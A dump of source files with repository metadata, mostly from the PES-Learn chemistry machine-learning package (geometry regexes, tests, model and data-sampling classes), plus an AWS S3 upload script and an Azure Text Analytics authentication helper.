errors)\nplt.axhline(color='black')\nplt.xlabel('Energy (kcal/mol)')\nplt.ylabel('Prediction Error (kcal/mol)')\nplt.show()\n```\n\n![plot](plot.png)\n" }, { "alpha_fraction": 0.6105157136917114, "alphanum_fraction": 0.6359678506851196, "avg_line_length": 35.414634704589844, "blob_id": "3a5a5f3a1f52843a01bd6d55060b2c57f4050461", "content_id": "fdb717b92cee592e8252d1b4c886d58dacbaf0ef", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2986, "license_type": "permissive", "max_line_length": 135, "num_lines": 82, "path": "/peslearn/utils/regex.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nContains variables and functions for simplifying regex code\n\"\"\"\n\ndef maybe(string):\n \"\"\"\n A regex wrapper for an arbitrary string.\n Allows a string to be present, but still matches if it is not present.\n \"\"\"\n return r'(?:{:s})?'.format(string)\n\ndef one_or_more(string):\n \"\"\"\n A regex wrapper for an arbitrary string.\n Allows an arbitrary number of successive valid matches (at least one) to be matched.\n \"\"\"\n return r'(?:{:s}){{1,}}'.format(string)\n\ndef two_or_more(string):\n \"\"\"\n A regex wrapper for an arbitrary string.\n Allows an arbitrary number of successive valid matches (at least two) to be matched.\n \"\"\"\n return r'(?:{:s}){{2,}}'.format(string)\n\n# save some common regex features as human readable variables\nletter = r'[a-zA-Z]'\n# floating point number with optional scientific notation\ndouble = r'-?\\d+\\.\\d+' + maybe('[E,e]' + '-?\\d+')\ninteger = r'\\d+'\nwhitespace = r'\\s'\nendline = r'\\n'\n# zero or more whitespace (ws) followed by the regex feature \nws_double = r'[ \\t]*' + double \nws_endline = r'[ \\t]*' + endline \nws_int = r'[ \\t]*' + integer \n\n# a regex identifier for an xyz style geometry line, atom_label x_coord y_coord z_coord\nxyz_line_regex = r'[ \\t]*' + letter + maybe(letter) + 3 * ws_double + ws_endline\n# an xyz style geometry block of any size\nxyz_block_regex = two_or_more(xyz_line_regex)\n\n# define generalized compact internal coordinates regex identifier\n# e.g.\n# O\n# H 1 1.0\n# H 1 1.0 2 104.5\n# H 1 1.0 2 100.00 3 180.0\n\nintcocompact_1 = r'[ \\t]*' + letter + maybe(letter) + ws_endline\nintcocompact_2 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_double + ws_endline\nintcocompact_3 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_double + ws_int + ws_double + ws_endline\nintcocompact_4 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_double + ws_int + ws_double + ws_int + ws_double + ws_endline\n\n# 
assume at least two atoms\nintcoords_compact_regex = intcocompact_1 + intcocompact_2 + maybe(intcocompact_3) + maybe(one_or_more(intcocompact_4))\n\n# define generalized standard internal coordinates regex identifier\n# e.g.\n# O\n# H 1 ROH\n# H 1 R2 2 AHOH\n# H 1 R3 2 A2 3 D1\n# ...\n# ROH = 1.0\n# R2 = 1.1\n# R3 = 1.2\n# AHOH = 100.5\n# A2 = 90.0\n# D1 = 120.00\n\ncoord_label = one_or_more(letter) + maybe(one_or_more(integer))\nws_coord_label = r'\\s*' + coord_label\n\n# zero or more spaces/tabs, atom label, connectivity and coordinate labels \nintco_1 = r'[ \\t]*' + letter + maybe(letter) + ws_endline\nintco_2 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_coord_label + ws_endline\nintco_3 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_coord_label + ws_int + ws_coord_label + ws_endline\nintco_4 = r'[ \\t]*' + letter + maybe(letter) + ws_int + ws_coord_label + ws_int + ws_coord_label + ws_int + ws_coord_label + ws_endline\n\n# assume at least two atoms\nintcoords_regex = intco_1 + intco_2 + maybe(intco_3) + maybe(one_or_more(intco_4))\n" }, { "alpha_fraction": 0.6236110925674438, "alphanum_fraction": 0.6541666388511658, "avg_line_length": 27.760000228881836, "blob_id": "509c69e1944a381d184d36c7003923c20a7790d5", "content_id": "e381c80dd80bf4d28b75f430168e54135c618991", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "permissive", "max_line_length": 72, "num_lines": 25, "path": "/tests/test_molecule.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the Atom/Molecule classes \n\"\"\"\n\nimport peslearn\nimport pytest\n\npath = 'tests/datafiles/input_zmat_1'\nwith open(path, 'r') as f:\n input_string = f.read()\n\ninput_obj = peslearn.InputProcessor(input_string)\nmol = peslearn.datagen.Molecule(input_obj.zmat_string)\n\ndef test_extract_zmat():\n assert mol.n_atoms == 4\n assert mol.atom_labels == ['C','H','H','H']\n assert mol.geom_parameters == ['RCH1', 'r2', 'a1', 'r3', 'a2', 'D1']\n\ndef test_molecule_update_intcoords():\n newmol = peslearn.datagen.Molecule(input_obj.zmat_string)\n disp = {'RCH1': 2.0, 'r2': 1.0}\n newmol.update_intcoords(disp)\n assert newmol.atoms[1].intcoords['RCH1'] == 2.0\n assert newmol.atoms[2].intcoords['r2'] == 1.0\n\n" }, { "alpha_fraction": 0.5818356275558472, "alphanum_fraction": 0.5867481231689453, "avg_line_length": 39.31401062011719, "blob_id": "016380149932203868548a9e5012d8ac340f3f66", "content_id": "4772074dbbd0e6fa6ba5632fd601485e64113df0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8346, "license_type": "permissive", "max_line_length": 133, "num_lines": 207, "path": "/peslearn/ml/model.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from .data_sampler import DataSampler \nfrom ..constants import hartree2cm, package_directory \nfrom ..utils.regex import xyz_block_regex\nfrom ..utils.geometry_transform_helper import load_cartesian_dataset\nfrom abc import ABC, abstractmethod\nimport re\nimport pandas as pd\nimport warnings\nimport numpy as np\nimport sklearn.metrics\n# GPy and sklearn output a bunch of annoying warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=RuntimeWarning)\n\nclass Model(ABC):\n \"\"\"\n Abstract class for Machine Learning Models\n\n Subclasses which inherit from Model: \n - GaussianProcess\n - NeuralNetwork\n\n 
Parameters\n ----------\n dataset_path : str \n A path to a potential energy surface file, which is readable as a\n pandas DataFrame by pandas.read_csv()\n\n input_obj : peslearn object \n InputProcessor object from peslearn. Used for keywords related to machine learning.\n\n molecule_type : str\n Molecule type defining number of each atom in decreasing order. \n AxByCz... where x,y,z are integers. E.g., H2O --> A2B, C2H4 --> A4B2\n\n molecule : peslearn object \n Molecule object from peslearn. Used to automatically define molecule_type\n \"\"\"\n def __init__(self, dataset_path, input_obj, molecule_type=None, molecule=None, train_path=None, test_path=None, valid_path=None):\n self.hyperparameter_space = {}\n data = self.interpret_dataset(dataset_path)\n self.train_path = train_path\n self.test_path = test_path\n self.valid_path = valid_path\n if train_path:\n self.traindata = self.interpret_dataset(train_path)\n self.raw_Xtr = self.traindata.values[:, :-1]\n self.raw_ytr = self.traindata.values[:,-1].reshape(-1,1)\n if test_path:\n self.testdata = self.interpret_dataset(test_path)\n self.raw_Xtest = self.testdata.values[:, :-1]\n self.raw_ytest = self.testdata.values[:,-1].reshape(-1,1)\n if valid_path:\n self.validdata = self.interpret_dataset(valid_path)\n self.raw_Xvalid = self.validdata.values[:, :-1]\n self.raw_yvalid = self.validdata.values[:,-1].reshape(-1,1)\n\n self.dataset = data.sort_values(\"E\")\n self.n_datapoints = self.dataset.shape[0]\n self.raw_X = self.dataset.values[:, :-1]\n self.raw_y = self.dataset.values[:,-1].reshape(-1,1)\n self.input_obj = input_obj\n\n self.pip = False\n if molecule:\n self.molecule_type = molecule.molecule_type\n if self.input_obj.keywords['use_pips'] == 'true':\n self.pip = True\n print(\"Using permutation invariant polynomial transformation for molecule type \", self.molecule_type)\n if molecule_type:\n self.molecule_type = molecule_type\n if self.input_obj.keywords['use_pips'] == 'true':\n self.pip = True\n print(\"Using permutation invariant polynomial transformation for molecule type \", self.molecule_type)\n \n # keyword control\n if self.input_obj.keywords['training_points']:\n self.ntrain = self.input_obj.keywords['training_points']\n else: \n self.ntrain = int(0.8*self.dataset.shape[0])\n if train_path:\n self.ntrain = self.traindata.shape[0]\n if self.ntrain > self.dataset.shape[0]:\n raise Exception(\"Requested number of training points is greater than size of the dataset.\")\n self.hp_maxit = self.input_obj.keywords['hp_maxit']\n\n if (train_path==None and test_path==None):\n self.sampler = self.input_obj.keywords['sampling']\n else:\n self.sampler = 'user_supplied'\n\n # train test split\n if self.input_obj.keywords['n_low_energy_train']:\n n = self.input_obj.keywords['n_low_energy_train']\n sample = DataSampler(self.dataset, self.ntrain, accept_first_n=n)\n else:\n sample = DataSampler(self.dataset, self.ntrain)\n if self.sampler == 'random':\n sample.random()\n elif self.sampler == 'smart_random':\n sample.smart_random()\n elif self.sampler == 'structure_based':\n sample.structure_based()\n elif self.sampler == 'sobol':\n sample.sobol()\n elif self.sampler == 'energy_ordered':\n sample.energy_ordered()\n elif self.sampler == 'user_supplied':\n pass\n else:\n raise Exception(\"Specified sampling method '{}' is not a valid option.\".format(input_obj.keywords['sampling']))\n self.train_indices, self.test_indices = sample.get_indices()\n super().__init__()\n\n def interpret_dataset(self, path):\n with open(path) as f:\n read = 
f.read()\n        if re.findall(xyz_block_regex, read):\n            data = load_cartesian_dataset(path)\n        else:\n            try:\n                data = pd.read_csv(path, sep=None, engine='python')\n            except: \n                raise Exception(\"\"\"Could not read dataset. Check to be sure the path is correct, and it is properly\n                                formatted. Can either be 1. A csv-style file with the first line being a list of\n                                arbitrary geometry labels with last column labeled 'E', e.g. r1,r2,r3,...,E or 2.\n                                A single energy value on its own line followed by a standard cartesian coordinate block\"\"\")\n        #try:\n        #    data = pd.read_csv(path, sep='\\s+', engine='python')\n        #try:\n        #    data = pd.read_csv(path, sep='\\s+')\n        #try:\n        #    data = pd.read_csv(path, sep=None)\n        return data\n\n    @abstractmethod\n    def build_model(self):\n        pass\n    @abstractmethod\n    def save_model(self):\n        pass\n    @abstractmethod\n    def preprocess(self):\n        pass\n    @abstractmethod\n    def split_train_test(self):\n        pass\n\n    def get_hyperparameters(self):\n        \"\"\"\n        Returns hyperparameters of this model\n        \"\"\"\n        return self.hyperparameter_space\n\n    def set_hyperparameter(self, key, val):\n        \"\"\"\n        Set hyperparameter 'key' to value 'val'.\n        Parameters\n        ----------\n        key : str\n            A hyperparameter name\n        val : obj\n            A HyperOpt object such as hp.choice, hp.uniform, etc.\n        \"\"\"\n        self.hyperparameter_space[key] = val\n\n    def compute_error(self, known_y, prediction, yscaler=None, max_errors=None):\n        \"\"\"\n        Compute the root-mean-square error (in wavenumbers) of the model given\n        known outputs, a prediction, and a y scaling object, if it exists.\n        \n        Parameters\n        ----------\n        known_y : ndarray\n            Array of expected model outputs (energies)\n        prediction: ndarray\n            Array of actual model outputs (energies)\n        yscaler: object\n            Sci-kit learn scaler object\n        max_errors: int\n            If given, also return the median error and this many of the largest absolute errors (in cm-1)\n\n        Returns\n        -------\n        error : float\n            Root mean square error in wavenumbers (cm-1)\n        median_error, largest_errors : ndarray\n            Also returned when max_errors is given\n        \"\"\"\n        if known_y.shape != prediction.shape:\n            raise Exception(\"Shape of known_y and prediction must be the same\")\n        if yscaler:\n            raw_y = yscaler.inverse_transform(known_y)\n            unscaled_prediction = yscaler.inverse_transform(prediction)\n            error = np.sqrt(sklearn.metrics.mean_squared_error(raw_y, unscaled_prediction))\n            if max_errors:\n                e = np.abs(raw_y - unscaled_prediction) * hartree2cm\n                median_error = np.median(e, axis=0)\n                largest_errors = np.partition(e, -max_errors, axis=0)[-max_errors:]\n        else:\n            error = np.sqrt(sklearn.metrics.mean_squared_error(known_y, prediction))\n            if max_errors:\n                e = np.abs(known_y - prediction) * hartree2cm\n                median_error = np.median(e, axis=0)\n                largest_errors = np.partition(e, -max_errors, axis=0)[-max_errors:]\n        if max_errors:\n            return error, median_error, largest_errors\n        else:\n            return error\n\n" }, { "alpha_fraction": 0.6609442234039307, "alphanum_fraction": 0.6723891496658325, "avg_line_length": 25.846153259277344, "blob_id": "0a652d26583e44eb2460de5c43498f9506e94c7d", "content_id": "16d588acb44e13af8838c31eda75ff8e6f0df7a6", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "permissive", "max_line_length": 90, "num_lines": 26, "path": "/tests/test_template.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the TemplateProcessor class methods\n\"\"\"\n\nimport peslearn\nimport pytest\nimport re\n\npath = 'tests/datafiles/xyz_template'\ntemplate_object = peslearn.datagen.Template(path)\n\ndef test_extract_xyz():\n    x = template_object.extract_xyz()\n    assert 
re.match(peslearn.utils.regex.xyz_block_regex, x)\n \ndef test_header_xyz():\n x = template_object.header_xyz()\n assert x == '# a psi4 input file to text xyz extraction\\n\\nmolecule test {\\n0 1\\n' \n\ndef test_footer_xyz():\n x = template_object.footer_xyz()\n assert x == \"}\\n\\nset basis cc-pvdz\\nset reference rhf\\n\\nenergy('hf')\\n\"\n\ndef test_parse_xyz():\n x, y = template_object.parse_xyz()\n assert ((x == 64) and (y == 115))\n\n" }, { "alpha_fraction": 0.6090154647827148, "alphanum_fraction": 0.6189174056053162, "avg_line_length": 44.904762268066406, "blob_id": "9e784c5ba4cf82433005a7295f17c9f6e94c4753", "content_id": "c5d85d962d570e752f428ff6bb69dc2347d1d0b6", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10604, "license_type": "permissive", "max_line_length": 127, "num_lines": 231, "path": "/peslearn/ml/data_sampler.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nA class for sampling train and test sets from PES datasets \n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.model_selection import train_test_split\n\nclass DataSampler(object):\n \"\"\"\n docstring\n \"\"\"\n def __init__(self, dataset, ntrain, accept_first_n=None, rseed=42):\n self.full_dataset = dataset.sort_values(\"E\")\n if accept_first_n:\n if accept_first_n > ntrain:\n raise Exception(\"Number of forced low-energy training points exceeds the indicated total training set size\")\n # remove first n points \n self.dataset = self.full_dataset[accept_first_n:]\n self.ntrain = ntrain - accept_first_n\n else:\n self.ntrain = ntrain\n self.dataset = self.full_dataset\n \n # ensure dataset is float\n self.dataset = self.dataset.astype('float64')\n \n self.dataset_size = self.dataset.shape[0]\n # currently needs to be pandas dataframe \n #if \"E\" in dataset.columns:\n # self.full_dataset = dataset.sort_values(\"E\")\n #else:\n # self.full_dataset = dataset\n self.rseed = rseed\n self.first_n = accept_first_n\n self.train_indices = None\n self.test_indices = None\n\n def set_indices(self, train_indices, test_indices):\n if self.first_n:\n # train/test indices were obtained relative to the dataset that had removed first n datapoints, adjust accordingly \n train_indices += self.first_n \n test_indices += self.first_n \n self.train_indices, self.test_indices = self.include_first_n(train_indices, test_indices)\n else:\n self.train_indices = train_indices\n self.test_indices = test_indices\n\n def get_indices(self):\n return self.train_indices, self.test_indices\n \n def include_first_n(self, train_indices, test_indices):\n \"\"\"\n Force first n lowest energy points to be in training set \n Useful for global-minimum-biased fits for applications such as vibrational computations.\n \"\"\" \n # force first n indices to be in training set\n a = np.arange(self.first_n) \n tmp = np.concatenate((train_indices, a) ,axis=0)\n train_indices = np.unique(tmp) # avoids double counting\n # adjust test set accordingly\n condition = test_indices > self.first_n\n test_indices = np.extract(condition, test_indices)\n return train_indices, test_indices\n \n def random(self):\n \"\"\"\n Randomly sample the dataset to obtain a training set of proper size.\n \"\"\"\n data = self.dataset.values\n X = data[:, :-1]\n y = data[:,-1].reshape(-1,1)\n indices = np.arange(self.dataset_size)\n train_indices, test_indices = train_test_split(indices, train_size=self.ntrain, random_state=self.rseed)\n #if 
self.first_n:\n        #    train_indices = self.include_first_n(train_indices)\n\n        self.set_indices(train_indices, test_indices)\n\n    def smart_random(self):\n        \"\"\"\n        Choose a random training set that has an energy distribution most resembling that of the full dataset.\n        Uses the Chi-Squared method to estimate the similarity of the energy distributions.\n        \"\"\"\n        data = self.dataset.values\n        X = data[:, :-1]\n        y = data[:,-1].reshape(-1,1)\n        full_dataset_dist, binedges = np.histogram(y, bins=10, density=True)\n        pvalues = []\n        chi = []\n        for seed in range(500):\n            X_train, X_test, y_train, y_test = train_test_split(X,y,train_size=self.ntrain, random_state=seed)\n            train_dist, tmpbin = np.histogram(y_train, bins=binedges, density=True)\n            chisq, p = stats.chisquare(train_dist, f_exp=full_dataset_dist)\n            chi.append(chisq)\n            pvalues.append(p)\n        best_seed = np.argmin(chi)\n        #best_seed = np.argmax(chi)\n        X_train, X_test, y_train, y_test = train_test_split(X,y,train_size=self.ntrain, random_state=best_seed)\n        train_dist, tmpbin = np.histogram(y_train, bins=binedges, density=True)\n\n        indices = np.arange(self.dataset_size)\n        train_indices, test_indices = train_test_split(indices, train_size=self.ntrain, random_state=best_seed)\n        self.set_indices(train_indices, test_indices)\n\n\n    def energy_ordered(self):\n        \"\"\"\n        A naive sampling algorithm, where we order the PES dataset\n        in terms of increasing energy, and take every nth datapoint such that we \n        get approximately the right number of training points.\n\n        A dataset first needs to be sorted by energy before calling.\n        Warning: Does not return exact number of desired training points. \n        \"\"\"\n        interval = round(self.dataset_size / self.ntrain)\n        indices = np.arange(self.dataset_size)\n        train_indices = indices[0::interval]\n        test_indices = np.delete(indices, indices[0::interval])\n        self.set_indices(train_indices, test_indices)\n\n    def sobol(self, delta=0.002278):\n        \"\"\"\n        A quasi-random sampling of the PES based on the relative energies.\n        First, the PES data is ordered in terms of increasing energy, \n        and each energy is shifted by the lowest energy in the dataset so the energy range becomes [0.00, max_E - min_E].\n        In each iteration, we draw a random number between 0 and 1 and a random datapoint from the PES.\n        We then compare the magnitude of the random number to the expression of the energy: \n        (V_max - V + delta) / (V_max + delta) > random_number\n        where V is the energy of the random datapoint, V_max is the maximum energy of the dataset, \n        and delta is a shift factor (default is 0.002278 Hartrees, 500 cm-1).\n        We accept the random datapoint to be a training point if the above condition is satisfied.\n        The result is a quasi-random series of training points whose distribution DOES NOT follow\n        the distribution of the full dataset. Instead, it is biased towards low to mid range energies. \n        This is appropriate for accurately modeling a minimum for vibrational applications, for example.\n\n        The Sobol expression is as implemented in Manzhos, Carrington J Chem Phys 145, 2016, and papers they cite.\n        \"\"\"\n        # Problems:\n        # 1. not easily reproducible with a random seed.\n        # 2. Scaling: could in principle improve scaling by doing minibatches in while loop... e.g. 
test.sample(n=minibatch)\n data = self.dataset.sort_values(\"E\")\n data['E'] = data['E'] - data['E'].min()\n \n max_e = data['E'].max()\n denom = (1 / (max_e + delta))\n train_indices = []\n indices = np.arange(data.shape[0])\n while len(train_indices) < self.ntrain:\n # randomly draw a PES datapoint \n rand_point = data.sample(n=1)\n rand_E = rand_point['E'].values\n condition = (max_e - rand_E + delta) * denom\n rand = np.random.uniform(0.0,1.0)\n # if this datapoint is already accepted into training set, skip it\n # (Not needed, as long as there are not equivalent geometries) \n #if any((rand_point.values == x).all() for x in train): \n # continue \n if condition > rand:\n train_indices.append(rand_point.index[0])\n data = data.drop(rand_point.index[0])\n test_indices = np.delete(indices, indices[train_indices])\n\n self.set_indices(train_indices, test_indices)\n\n\n def structure_based(self):\n \"\"\"\n Sample the geometries according to their L2 norms from one another.\n Based on the algorithm described in Dral et al, J Chem Phys, 146, 244108, 2017\n and references therein. Please cite appropriately if used. \n First the point closest to the global minimum is taken as the first training point.\n The second training point is that which is 'furthest' from the first.\n Each additional training point is added by \n 1. For each new training point candidate, compute shortest distance \n to every point in training set.\n 2. Find the training point candidate with the largest shortest distance to the training set\n 3. Add this candidate to the training set, remove from the test set.\n 4. Repeat 1-3 until desired number of points obtained.\n \"\"\"\n data = self.dataset\n train = []\n train.append(data.values[0])\n\n def norm(train_point, data=data):\n \"\"\" Computes norm between training point geometry and every point in dataset\"\"\"\n tmp1 = np.tile(train_point[:-1], (data.shape[0],1))\n diff = tmp1 - data.values[:,:-1]\n norm_vector = np.sqrt(np.einsum('ij,ij->i', diff, diff))\n return norm_vector\n\n # accept farthest point from 1st training point as the 2nd training point\n norm_vector_1 = norm(train[0])\n idx = np.argmax(norm_vector_1)\n newtrain = data.values[idx]\n train.append(newtrain)\n\n # create norm matrix, whose rows are all the norms to 1st and 2nd training points \n norm_vector_2 = norm(train[1])\n norm_matrix = np.vstack((norm_vector_1, norm_vector_2))\n\n # find the minimum value along the columns of this 2xN array of norms\n min_array = np.amin(norm_matrix, axis=0)\n train_indices = []\n train_indices.append(0)\n train_indices.append(idx)\n\n while len(train) < self.ntrain:\n # min_array contains the smallest norms into the training set, by datapoint.\n # We take the largest one.\n idx = np.argmax(min_array)\n train_indices.append(idx)\n new_geom = data.values[idx]\n train.append(new_geom)\n # update norm matrix with the norms of newly added training point\n norm_vec = norm(train[-1])\n stack = np.vstack((min_array, norm_vec))\n min_array = np.amin(stack, axis=0)\n\n indices = np.arange(self.dataset_size)\n test_indices = np.delete(indices, indices[train_indices])\n train_indices = np.asarray(train_indices)\n # do not sort. 
This ruins the building-up method of the PES\n #train_indices = np.sort(train_indices)\n self.set_indices(train_indices, test_indices)\n\n def energy_gaussian(self):\n \"\"\"\n Heavily biases towards low energy region\n \"\"\"\n pass\n" }, { "alpha_fraction": 0.5360763072967529, "alphanum_fraction": 0.6475849747657776, "avg_line_length": 41.97435760498047, "blob_id": "a385b80b56c2eae47151501b3d9c33c749971d18", "content_id": "afb39fc632529ac568ba337245e16da6e9e06bb9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1677, "license_type": "permissive", "max_line_length": 162, "num_lines": 39, "path": "/tests/test_outputfile.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the OutputFile class methods\n\"\"\"\nimport numpy as np\nimport peslearn\nimport pytest\nimport re\n\n\n# open an output file\npath = 'tests/datafiles/molpro_water_gradient'\noutputfile = peslearn.datagen.OutputFile(path)\n\ndef test_extract_energy_with_regex():\n energy = outputfile.extract_energy_with_regex(\"!CCSD\\(T\\) total energy\\s+(-?\\d+.\\d+)\")\n assert energy == -76.241305026974\n\ndef test_extract_energy_with_cclib():\n energy = outputfile.extract_energy_with_cclib(\"ccenergies\")\n #cclib converts energies to eV, so you lose precision\n assert energy.round(8) == -76.24130503\n\ndef test_extract_cartesian_gradient_with_regex():\n gradient = outputfile.extract_cartesian_gradient_with_regex(\"Atom\\s+dE/dx\\s+dE/dy.+\", \"Reading points\", \"\\s+\\d+\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\")\n test = np.array([[ 0.000000000 , 0.000000025 , 0.000000007 ], \n [ 0.000000000 , -0.000000005 , 0.000000007 ],\n [-0.000000000 , -0.000000019 , -0.000000013 ]])\n assert np.allclose(gradient,test)\n\n# cclib currently has poor gradient support, only psi4, qchem, and gaussian well supported. 
Molpro works in fringe cases \n# have to test with qchem for now\npath_2 = 'tests/datafiles/qchem_water_gradient'\noutputfile_2 = peslearn.datagen.OutputFile(path_2)\ndef test_extract_cartesian_gradient_with_cclib():\n gradient = outputfile_2.extract_cartesian_gradient_with_cclib()\n test = np.array([[ 0.0000000, 0.000000, 0.1273959],\n [-0.0917225, -0.000000, -0.063698 ],\n [ 0.0917225, 0.000000, -0.063698 ]])\n assert np.allclose(gradient, test)\n\n" }, { "alpha_fraction": 0.5658578872680664, "alphanum_fraction": 0.566724419593811, "avg_line_length": 28.564102172851562, "blob_id": "a9ffbe304a4eb6807133ac78a4a6b24e9e4af8d1", "content_id": "3416028eb9bdabd81d568e50b46d50027fd65159", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2308, "license_type": "permissive", "max_line_length": 90, "num_lines": 78, "path": "/peslearn/datagen/template.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nContains the TemplateProcessor class for handling template input file data\n\"\"\"\n\nfrom ..utils import regex\nimport re\n\nclass Template(object):\n \"\"\"\n A class for handling template input files for electronic structure theory codes\n Parameters\n ----------\n template_path : str\n A path to a template input file \n \"\"\"\n\n def __init__(self, template_path):\n with open(template_path, 'r') as f:\n template = f.read()\n self.template = template\n self.start, self.end = self.parse_xyz()\n\n def parse_xyz(self):\n \"\"\"\n Locates the file positions of the xyz geometry.\n Returns\n -------\n bounds : tuple\n A tuple of size two: start and end string positions of the xyz geometry block \n \"\"\" \n iter_matches = re.finditer(regex.xyz_block_regex, self.template, re.MULTILINE)\n matches = [match for match in iter_matches]\n if matches is None:\n raise Exception(\"No XYZ geometry found in template input file\")\n # only find last xyz if there are multiple\n # grab string positions of xyz coordinates\n start = matches[-1].start() \n end = matches[-1].end() \n return start, end \n\n def header_xyz(self):\n \"\"\"\n The header of the xyz template input file (all text before the geometry) \n\n Returns\n -------\n header : str\n All template input file text before xyz geometry specification \n \"\"\"\n header = self.template[:self.start]\n return header \n\n def footer_xyz(self):\n \"\"\"\n The footer of the xyz template input file (all text after the geometry) \n\n Returns\n -------\n header : str\n All template input file text after xyz geometry specification \n \"\"\"\n footer = self.template[self.end:]\n return footer\n\n def extract_xyz(self):\n \"\"\"\n Extracts an xyz-style geometry block from a template input file \n\n Returns\n ------- \n XYZ : str\n An xyz geometry of the form:\n atom_label x_coord y_coord z_coord \n atom_label x_coord y_coord z_coord \n ...\n \"\"\"\n xyz = self.template[self.start:self.end]\n return xyz\n\n\n" } ]
34
chahatd/aws-cost-and-usage
https://github.com/chahatd/aws-cost-and-usage
e45c681dd24f046a149e2f41289a13259ba0e871
6d587bb912f459ecc5f6445c2d278866a3964f48
76ff3052666623778ccff89253c4945a59c1eede
refs/heads/master
2023-06-26T07:27:45.715562
2021-08-02T08:21:57
2021-08-02T08:21:57
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6784741282463074, "alphanum_fraction": 0.6948229074478149, "avg_line_length": 30.913043975830078, "blob_id": "009da0f4f8a1fb493ed143c3156ab37be7b92ed2", "content_id": "74db25c41d3d486a9a357d6152c6bf7f04a436a4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1468, "license_type": "permissive", "max_line_length": 118, "num_lines": 46, "path": "/action/run.py", "repo_name": "chahatd/aws-cost-and-usage", "src_encoding": "UTF-8", "text": "import os\nimport boto3\nimport logging\n\nfrom botocore.exceptions import NoCredentialsError\n\n# Set logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nLAMBDA_FUNCTION_CODE_ZIP_FILE_NAME = 'lambda_function_code.zip'\nLAMBDA_FUNCTION_CODE_ZIP_FILE_PATH = \"{0}/{1}\".format(os.environ['SOURCE_DIR'], LAMBDA_FUNCTION_CODE_ZIP_FILE_NAME)\nAUTO_DEPLOYMENT_YAML_FILE_NAME = 'auto-deployment.yaml'\nAUTO_DEPLOYMENT_YAML_FILE_PATH = \"{0}/{1}\".format(os.environ['SOURCE_DIR'], AUTO_DEPLOYMENT_YAML_FILE_NAME)\n\n\ndef empty_s3_bucket(bucket):\n s3resource = boto3.resource('s3')\n bucket = s3resource.Bucket(bucket)\n\n bucket.objects.delete()\n print(\"S3 bucket is now empty\")\n\n\ndef upload_to_aws(local_file, bucket, s3_file):\n s3client = boto3.client('s3')\n\n try:\n s3client.upload_file(local_file, bucket, s3_file, ExtraArgs={'ACL': 'public-read'})\n print(\"{} was uploaded successfully\".format(s3_file))\n except FileNotFoundError:\n print(\"The file {} was not found\".format(local_file))\n exit(1)\n except NoCredentialsError:\n print(\"Credentials not available\")\n exit(1)\n\n\ndef main():\n empty_s3_bucket(os.environ['AWS_S3_BUCKET'])\n upload_to_aws(LAMBDA_FUNCTION_CODE_ZIP_FILE_PATH, os.environ['AWS_S3_BUCKET'], LAMBDA_FUNCTION_CODE_ZIP_FILE_NAME)\n upload_to_aws(AUTO_DEPLOYMENT_YAML_FILE_PATH, os.environ['AWS_S3_BUCKET'], AUTO_DEPLOYMENT_YAML_FILE_NAME)\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
baky0905/azure-text-analytics
https://github.com/baky0905/azure-text-analytics
ff706d4189b7b6642fe95b79de6fd1897d1ff78b
49584d81e9fd5d4f438b8437f871f85f3c0b24ea
f0e832df31db8c9bdfaf7268da639be0f480e9e0
refs/heads/main
2023-06-17T06:41:27.086387
2021-07-11T20:37:46
2021-07-11T20:37:46
385,041,057
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7665847539901733, "alphanum_fraction": 0.7665847539901733, "avg_line_length": 29.071428298950195, "blob_id": "cecce9e14d93f97afaadefdb746b3ff87f3010b5", "content_id": "15f0282f0d8c10e14cb792c74941ae5e137d04d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/utils.py", "repo_name": "baky0905/azure-text-analytics", "src_encoding": "UTF-8", "text": "from azure.core.credentials import AzureKeyCredential\nfrom azure.ai.textanalytics import TextAnalyticsClient\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\n\ndef authenticate_client():\n    ta_credential = AzureKeyCredential(os.getenv(\"KEY\"))\n    text_analytics_client = TextAnalyticsClient(\n        endpoint=os.getenv('ENDPOINT'),\n        credential=ta_credential)\n    return text_analytics_client\n" }, { "alpha_fraction": 0.5074940919876099, "alphanum_fraction": 0.5153825879096985, "avg_line_length": 29.918699264526367, "blob_id": 